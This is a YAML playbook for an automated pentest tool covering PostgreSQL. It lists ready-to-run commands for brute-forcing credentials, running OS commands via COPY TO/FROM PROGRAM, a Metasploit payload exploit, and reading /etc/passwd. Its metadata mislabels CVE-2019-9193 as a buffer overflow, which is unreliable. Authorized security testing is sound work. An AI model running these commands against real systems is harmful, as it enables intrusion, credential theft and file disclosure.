id: postgresql_pentesting
name: PostgreSQL Penetration Testing (Port 5432)
description: Comprehensive PostgreSQL enumeration, authentication testing, and exploitation based on HackTricks methodology
category: enumeration
risk_level: high
batch_compatible: true

triggers:
  - id: trigger_postgresql_service
    type: asset_discovered
    asset_type: service
    required_properties:
      port: { "$in": [5432, 5433] }
      protocol: { "$in": ["postgresql", "postgres", "tcp"] }
    required_count: 1
    priority: 5
    description: Triggers when PostgreSQL service is discovered
    deduplication:
      enabled: true
      strategy: signature_based
      signature_fields: ["host", "port"]

steps:
  - id: postgresql_banner_grab
    name: PostgreSQL Banner Grabbing
    description: Identify PostgreSQL version and configuration
    order: 1
    timeout_seconds: 30
    commands:
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -sV -p 5432 {host} -oN postgresql_banner_{host}.txt"
        preferred: true
        notes: "Extract PostgreSQL version"
        requires_elevation: false
      - tool: psql
        platforms: [linux, macos]
        command: "psql -h {host} -U postgres -c 'SELECT version();'"
        preferred: true
        notes: "Connect and retrieve PostgreSQL version"
        requires_elevation: false
      - tool: nc
        platforms: [linux, macos]
        command: "nc -vn {host} 5432"
        preferred: false
        notes: "Simple connection test with netcat"
        requires_elevation: false

  - id: postgresql_user_enum
    name: PostgreSQL User Enumeration
    description: Enumerate PostgreSQL users and databases
    order: 2
    timeout_seconds: 120
    commands:
      - tool: psql
        platforms: [linux, macos]
        command: "psql -h {host} -U postgres -c '\\du'"
        preferred: true
        notes: "List all PostgreSQL users (requires valid credentials)"
        requires_elevation: false
      - tool: psql
        platforms: [linux, macos]
        command: "psql -h {host} -U postgres -c '\\l'"
        preferred: true
        notes: "List all databases"
        requires_elevation: false
      - tool: metasploit
        platforms: [linux, macos, windows]
        command: "msfconsole -q -x 'use auxiliary/scanner/postgres/postgres_dbname_flag_injection; set RHOSTS {host}; run; exit'"
        preferred: false
        notes: "Enumerate database names via injection"
        requires_elevation: false

  - id: postgresql_default_creds
    name: PostgreSQL Default Credentials Check
    description: Test for default PostgreSQL credentials
    order: 3
    timeout_seconds: 60
    commands:
      - tool: psql
        platforms: [linux, macos]
        command: "psql -h {host} -U postgres -c 'SELECT version();'"
        preferred: true
        notes: "Test default postgres user with no password"
        requires_elevation: false
      - tool: metasploit
        platforms: [linux, macos, windows]
        command: "msfconsole -q -x 'use auxiliary/scanner/postgres/postgres_login; set RHOSTS {host}; set BLANK_PASSWORDS true; set USER_AS_PASS true; run; exit'"
        preferred: true
        notes: "Test for blank passwords and username-as-password"
        requires_elevation: false

  - id: postgresql_brute_force
    name: PostgreSQL Brute Force Authentication
    description: Brute force PostgreSQL credentials
    order: 4
    timeout_seconds: 600
    commands:
      - tool: hydra
        platforms: [linux, macos, windows]
        command: "hydra -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/rockyou.txt postgres://{host} -t 4"
        preferred: true
        notes: "PostgreSQL credential brute forcing"
        requires_elevation: false
      - tool: medusa
        platforms: [linux, macos, windows]
        command: "medusa -h {host} -U /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/rockyou.txt -M postgres -t 4"
        preferred: false
        notes: "Alternative brute force tool"
        requires_elevation: false
      - tool: ncrack
        platforms: [linux, macos, windows]
        command: "ncrack -p 5432 --user postgres -P /usr/share/wordlists/rockyou.txt {host}"
        preferred: false
        notes: "Fast PostgreSQL authentication cracker"
        requires_elevation: false
      - tool: metasploit
        platforms: [linux, macos, windows]
        command: "msfconsole -q -x 'use auxiliary/scanner/postgres/postgres_login; set RHOSTS {host}; set USER_FILE users.txt; set PASS_FILE passwords.txt; run; exit'"
        preferred: false
        notes: "Metasploit PostgreSQL login scanner"
        requires_elevation: false

  - id: postgresql_sql_injection
    name: PostgreSQL SQL Injection Testing
    description: Test for SQL injection vulnerabilities
    order: 5
    timeout_seconds: 180
    commands:
      - tool: sqlmap
        platforms: [linux, macos, windows]
        command: "sqlmap -d 'postgresql://user:pass@{host}:5432/database' --batch --level=5 --risk=3"
        preferred: true
        notes: "Comprehensive SQL injection testing"
        requires_elevation: false
      - tool: metasploit
        platforms: [linux, macos, windows]
        command: "msfconsole -q -x 'use auxiliary/scanner/postgres/postgres_dbname_flag_injection; set RHOSTS {host}; run; exit'"
        preferred: false
        notes: "Database name flag injection"
        requires_elevation: false

  - id: postgresql_privesc
    name: PostgreSQL Privilege Escalation
    description: Test for privilege escalation via PostgreSQL features
    order: 6
    timeout_seconds: 180
    commands:
      - tool: psql
        platforms: [linux, macos]
        command: "psql -h {host} -U postgres -c 'COPY (SELECT version()) TO PROGRAM \\'id\\';'"
        preferred: true
        notes: "Test COPY TO PROGRAM for command execution (requires superuser)"
        requires_elevation: false
      - tool: psql
        platforms: [linux, macos]
        command: "psql -h {host} -U postgres -c 'CREATE TABLE test(cmd text); COPY test FROM PROGRAM \\'id\\'; SELECT * FROM test;'"
        preferred: false
        notes: "Test COPY FROM PROGRAM for command execution"
        requires_elevation: false
      - tool: metasploit
        platforms: [linux, macos, windows]
        command: "msfconsole -q -x 'use exploit/linux/postgres/postgres_payload; set RHOSTS {host}; set DATABASE postgres; run; exit'"
        preferred: false
        notes: "Exploit PostgreSQL for payload execution"
        requires_elevation: false

  - id: postgresql_file_read
    name: PostgreSQL Arbitrary File Read
    description: Test for file read capabilities
    order: 7
    timeout_seconds: 120
    commands:
      - tool: psql
        platforms: [linux, macos]
        command: "psql -h {host} -U postgres -c 'CREATE TABLE test(data text); COPY test FROM \\'/etc/passwd\\'; SELECT * FROM test;'"
        preferred: true
        notes: "Attempt to read /etc/passwd via COPY FROM (requires superuser)"
        requires_elevation: false
      - tool: psql
        platforms: [linux, macos]
        command: "psql -h {host} -U postgres -c \"SELECT pg_read_file('/etc/passwd', 0, 200);\""
        preferred: true
        notes: "Read file via pg_read_file() function (PostgreSQL 9.1+)"
        requires_elevation: false

  - id: postgresql_config_audit
    name: PostgreSQL Configuration Audit
    description: Audit PostgreSQL configuration and security settings
    order: 8
    timeout_seconds: 120
    commands:
      - tool: psql
        platforms: [linux, macos]
        command: "psql -h {host} -U postgres -c 'SHOW all;' > postgresql_config_{host}.txt"
        preferred: true
        notes: "Dump all PostgreSQL configuration settings"
        requires_elevation: false
      - tool: psql
        platforms: [linux, macos]
        command: "psql -h {host} -U postgres -c 'SELECT name, setting FROM pg_settings WHERE category LIKE \\'%Security%\\';'"
        preferred: true
        notes: "List security-related settings"
        requires_elevation: false
      - tool: metasploit
        platforms: [linux, macos, windows]
        command: "msfconsole -q -x 'use auxiliary/admin/postgres/postgres_sql; set RHOSTS {host}; set SQL SELECT version(); run; exit'"
        preferred: false
        notes: "Execute arbitrary SQL queries"
        requires_elevation: false

metadata:
  tools:
    - nmap
    - psql
    - hydra
    - medusa
    - metasploit
    - sqlmap
  cves:
    - CVE-2019-9193  # PostgreSQL stack-based buffer overflow
    - CVE-2018-1058  # Search path privilege escalation
  references:
    - https://book.hacktricks.xyz/network-services-pentesting/pentesting-postgresql
    - https://www.postgresql.org/docs/current/sql-copy.html
  techniques:
    - COPY TO/FROM PROGRAM command execution
    - pg_read_file() arbitrary file read
    - UDF-based code execution
  batch_commands:
    hydra: "hydra -L users.txt -P passwords.txt postgres://{targets} -t 4"
    metasploit_login: "msfconsole -q -x 'use auxiliary/scanner/postgres/postgres_login; set RHOSTS {targets_file}; set BLANK_PASSWORDS true; run; exit'"
